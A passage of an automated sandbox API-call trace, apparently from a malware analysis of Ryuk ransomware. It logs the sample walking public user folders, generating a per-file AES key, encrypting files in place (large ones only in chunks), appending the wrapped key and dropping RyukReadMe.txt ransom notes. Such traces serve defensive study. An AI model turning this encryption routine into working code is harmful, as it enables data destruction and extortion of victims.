(lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.637] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.637] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xbde6b, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xbde6b, lpOverlapped=0x0) returned 1 [0160.650] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.650] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xbde6b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xbde70) returned 1 [0160.654] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.654] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xbde70, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xbde70, lpOverlapped=0x0) returned 1 [0160.656] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.656] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.656] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.656] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.656] CloseHandle (hObject=0x18c) returned 1 [0160.660] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.664] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.664] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.664] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.664] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.664] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg", dwFileAttributes=0x80) returned 1 [0160.665] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\Tulips.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\tulips.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.665] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=620888) returned 1 [0160.665] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=620888) returned 1 [0160.665] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x97836, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.665] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.666] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.666] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.666] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.666] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.666] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x97958, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x97958, lpOverlapped=0x0) returned 1 [0160.677] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.677] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x97958, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x97960) returned 1 [0160.681] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.681] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x97960, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x97960, lpOverlapped=0x0) returned 1 [0160.682] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0160.682] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.682] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.682] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.682] CloseHandle (hObject=0x18c) returned 1 [0160.689] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.693] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.693] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.693] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0160.693] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.693] SetLastError (dwErrCode=0x0) [0160.693] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\Sample Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\public\\pictures\\sample pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.693] GetLastError () returned 0x0 [0160.693] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0160.694] CloseHandle (hObject=0x188) returned 1 [0160.694] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0160.694] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.694] SetLastError (dwErrCode=0x0) [0160.694] CreateFileW (lpFileName="C:\\Users\\Public\\Pictures\\RyukReadMe.txt" (normalized: "c:\\users\\public\\pictures\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.694] GetLastError () returned 0xb7 [0160.694] CloseHandle (hObject=0x184) returned 1 [0160.694] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.694] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.694] SetLastError (dwErrCode=0x0) [0160.694] CreateFileW (lpFileName="C:\\Users\\Public\\RyukReadMe.txt" (normalized: "c:\\users\\public\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.694] GetLastError () returned 0xb7 [0160.695] CloseHandle (hObject=0x184) returned 1 [0160.695] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.695] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.695] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.695] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.695] SetLastError (dwErrCode=0x0) [0160.695] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\RyukReadMe.txt" (normalized: "c:\\users\\public\\recorded tv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.695] GetLastError () returned 0x0 [0160.695] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0160.696] CloseHandle (hObject=0x188) returned 1 [0160.696] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0160.696] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.696] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.696] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.696] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.697] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv", dwFileAttributes=0x80) returned 1 [0160.697] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\win7_scenic-demoshort_raw.wtv" (normalized: "c:\\users\\public\\recorded tv\\sample media\\win7_scenic-demoshort_raw.wtv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.697] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=9699328) returned 1 [0160.697] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=9699328) returned 1 [0160.697] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x93fede, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.697] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.699] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.699] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.699] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.699] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac888, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesRead=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0160.700] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.700] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.700] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.700] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.722] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.722] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.729] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.729] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.732] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.732] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.745] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240) returned 1 [0160.745] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240, dwBufLen=0xf4240 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0xf4240) returned 1 [0160.751] SetFilePointer (in: hFile=0x18c, lDistanceToMove=1000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xf4240 [0160.751] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf4240, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0xf4240, lpOverlapped=0x0) returned 1 [0160.754] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.754] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x0, lpOverlapped=0x0) returned 1 [0160.754] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0160.754] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x0, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10) returned 1 [0160.754] SetFilePointer (in: hFile=0x18c, lDistanceToMove=2000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1e8480 [0160.754] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10, lpOverlapped=0x0) returned 1 [0160.754] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0160.754] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0xa, lpOverlapped=0x0) returned 1 [0160.755] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.755] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0160.755] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0160.755] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2 | out: lpNewFilePointer=0x0) returned 1 [0160.755] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac888*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesWritten=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0160.755] CloseHandle (hObject=0x18c) returned 1 [0160.755] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.759] CryptDestroyKey (hKey=0x3b8690) returned 1 [0160.759] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.759] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0160.759] FindClose (in: hFindFile=0x3a2e20 | out: hFindFile=0x3a2e20) returned 1 [0160.760] SetLastError (dwErrCode=0x0) [0160.760] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\Sample Media\\RyukReadMe.txt" (normalized: "c:\\users\\public\\recorded tv\\sample media\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.819] GetLastError () returned 0x0 [0160.819] WriteFile (in: hFile=0x188, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad1f0*=0x320, lpOverlapped=0x0) returned 1 [0160.820] CloseHandle (hObject=0x188) returned 1 [0160.820] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0160.820] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0160.820] SetLastError (dwErrCode=0x0) [0160.820] CreateFileW (lpFileName="C:\\Users\\Public\\Recorded TV\\RyukReadMe.txt" (normalized: "c:\\users\\public\\recorded tv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.820] GetLastError () returned 0xb7 [0160.820] CloseHandle (hObject=0x184) returned 1 [0160.820] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.820] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.821] SetFileAttributesW (lpFileName="C:\\Users\\Public\\sys", dwFileAttributes=0x80) returned 1 [0160.821] CreateFileW (lpFileName="C:\\Users\\Public\\sys" (normalized: "c:\\users\\public\\sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0160.821] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0160.821] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0160.821] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.821] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0160.821] SetLastError (dwErrCode=0x0) [0160.821] CreateFileW (lpFileName="C:\\Users\\Public\\RyukReadMe.txt" (normalized: "c:\\users\\public\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0160.822] GetLastError () returned 0xb7 [0160.822] CloseHandle (hObject=0x184) returned 1 [0160.822] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0160.822] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.822] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.822] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.822] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0160.822] SetLastError (dwErrCode=0x0) [0160.822] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\RyukReadMe.txt" (normalized: "c:\\users\\public\\videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0160.822] GetLastError () returned 0xb7 [0160.822] CloseHandle (hObject=0x188) returned 1 [0160.822] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0160.822] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.822] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.822] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0160.822] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0160.823] SetFileAttributesW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", dwFileAttributes=0x80) returned 1 [0160.823] CreateFileW (lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample videos\\wildlife.wmv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0160.823] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=26246026) returned 1 [0160.823] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=26246026) returned 1 [0160.823] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x1907a68, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0160.823] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0160.825] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.825] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0160.825] SetFilePointer (in: hFile=0x18c, lDistanceToMove=5000000, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4c4b40 [0160.825] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac888, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac888*, lpNumberOfBytesRead=0x29ac858*=0x10, lpOverlapped=0x0) returned 1 [0160.828] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.828] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0160.829] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0160.829] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf4240, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: 